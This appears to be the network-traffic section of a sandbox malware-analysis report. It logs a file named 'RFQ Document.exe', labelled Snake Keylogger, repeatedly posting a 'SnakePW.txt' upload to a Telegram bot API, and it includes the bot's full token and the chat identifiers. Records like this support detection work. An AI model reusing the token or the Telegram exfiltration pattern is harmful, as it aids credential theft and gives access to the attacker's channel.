2021-09-28 05:59:14 UTC	308	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:14 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:14 UTC	308	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12782,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808754,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
193	192.168.2.4	50014	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:14 UTC	308	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e227801e Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:14 UTC	309	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 32 37 38 30 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e227801eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:15 UTC	309	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:15 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:15 UTC	310	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12783,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808754,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
194	192.168.2.4	50015	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:15 UTC	310	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e24632ff Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:15 UTC	310	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 34 36 33 32 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e24632ffContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:15 UTC	311	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:15 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:15 UTC	311	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12784,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808755,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
195	192.168.2.4	50016	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:15 UTC	312	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e25baf50 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:15 UTC	312	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 35 62 61 66 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e25baf50Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:15 UTC	312	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:15 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:15 UTC	313	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12785,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808755,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
196	192.168.2.4	50017	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:15 UTC	313	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e27aa8ab Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:15 UTC	314	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 37 61 61 38 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e27aa8abContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:15 UTC	314	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:15 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:15 UTC	314	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12786,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808755,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
197	192.168.2.4	50018	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:15 UTC	315	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e299a6d4 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:15 UTC	315	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 39 39 61 36 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e299a6d4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:15 UTC	316	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:15 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:15 UTC	316	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12787,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808755,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
198	192.168.2.4	50019	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:15 UTC	316	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e2af1b82 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:15 UTC	317	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 61 66 31 62 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e2af1b82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:15 UTC	317	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:15 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:15 UTC	318	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12788,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808755,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
199	192.168.2.4	50020	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:15 UTC	318	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e2c6f1b5 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:15 UTC	318	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 63 36 66 31 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e2c6f1b5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:16 UTC	319	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:16 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:16 UTC	319	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 36 2c 22 64 Data Ascii: 